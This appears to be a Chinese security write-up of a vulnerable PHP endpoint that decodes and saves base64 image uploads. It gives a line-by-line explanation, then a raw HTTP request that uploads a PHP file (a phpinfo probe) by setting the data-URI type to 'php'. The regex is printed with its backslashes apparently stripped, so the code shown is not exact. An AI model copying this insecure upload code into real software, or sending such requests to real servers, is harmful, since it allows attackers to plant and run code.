白盒变黑盒。。。——一套漏洞百出的源码

<?php  /** * Description: PhpStorm. * Author: yoby * DateTime: 2018/12/4 18:01 * Email:logove@qq.com * Copyright Yoby版权所有 */  $img = $_POST['imgbase64'];if (preg_match('/^(data:s*image/(w+);base64,)/', $img, $result)) {  $type = ".".$result[2];  $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;}$img =  base64_decode(str_replace($result[1], '', $img));@file_put_contents($path, $img);exit('{"src":"'.$path.'"}');

这段PHP代码的作用是接收通过POST请求传递的base64编码的图像数据，并将其解码保存为图片文件。以下是代码的逐行解释：<?php: PHP代码的起始标记。注释块描述了这段代码的作用、作者、日期和联系方式。$img = $_POST['imgbase64'];: 从POST请求中获取名为imgbase64的参数，该参数应包含base64编码的图像数据，并将其存储在变量$img中。if (preg_match('/^(data:s*image/(w+);base64,)/', $img, $result)) {: 使用正则表达式匹配图像数据中的base64编码格式，并将结果存储在变量$result中。这个正则表达式用于匹配data:image/xxx;base64,这样的图像数据头部。$type = ".".$result[2];: 提取匹配结果中的图像类型，并将其作为文件的扩展名，存储在变量$type中。$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;: 构造文件路径，其中包含上传日期和唯一的文件标识符，并将文件扩展名添加到文件名中。$img = base64_decode(str_replace($result[1], '', $img));: 使用base64_decode()函数解码图像数据，并将其存储在变量$img中。str_replace()函数用于移除图像数据头部，因为base64_decode()函数不需要该部分数据。@file_put_contents($path, $img);: 将解码后的图像数据写入文件，文件路径为之前构造的路径。exit('{"src":"'.$path.'"}');: 输出JSON格式的响应，包含保存的图像文件路径，然后终止脚本的执行。需要注意的是，代码中的@符号用于抑制可能的文件写入错误，这样可以避免将错误信息暴露给终端用户。然而，实际生产环境中最好进行错误处理和安全性检查，以确保代码的可靠性和安全性。

POST /uploadbase64.php HTTP/1.1Host: 192.168.0.115Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://192.168.0.115/system/juese.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 56imgbase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==